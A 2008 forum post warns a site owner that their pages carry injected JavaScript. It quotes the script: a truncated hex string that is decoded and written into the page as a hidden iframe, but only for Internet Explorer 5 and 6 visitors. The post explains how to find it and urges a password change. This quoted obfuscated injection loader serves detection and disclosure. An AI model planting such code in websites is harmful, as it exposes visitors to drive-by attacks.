Thread: What a month
View Single Post
Old 2008-04-14, 12:55 AM   #7
pc
Shift Out / X-On
 
pc's Avatar
 
Join Date: Jul 2007
Location: unknown
Posts: 2,298
Send a message via ICQ to pc
Well this is the part of the code that is there:
<script> var s='3C69............672616D653E'; var o=''; for(i=0;i<s.length;i=i+2) { var c=String.fromCharCode(37); o=o+c+s.substr(i,2);} var v=navigator.appVersion; if (v.indexOf('MSIE 6.0') != -1){document.write(unescape(o));}if (v.indexOf('MSIE 5.') != -1){document.write(unescape(o));}</script>

Any good antivirus should detect that ( I have Micro Trend )When I open your site I have alert from my soft about hi jack attempt from your site

If you using firefox push ctrl+u then scroll page right and down everywhere,you should find it

more about this is here: http://www.greenguysboard.com/board/...ad.php?t=46240
and here: http://www.greenguysboard.com/board/...ad.php?t=46341

You should change all your paaswords
pc is offline   Reply With Quote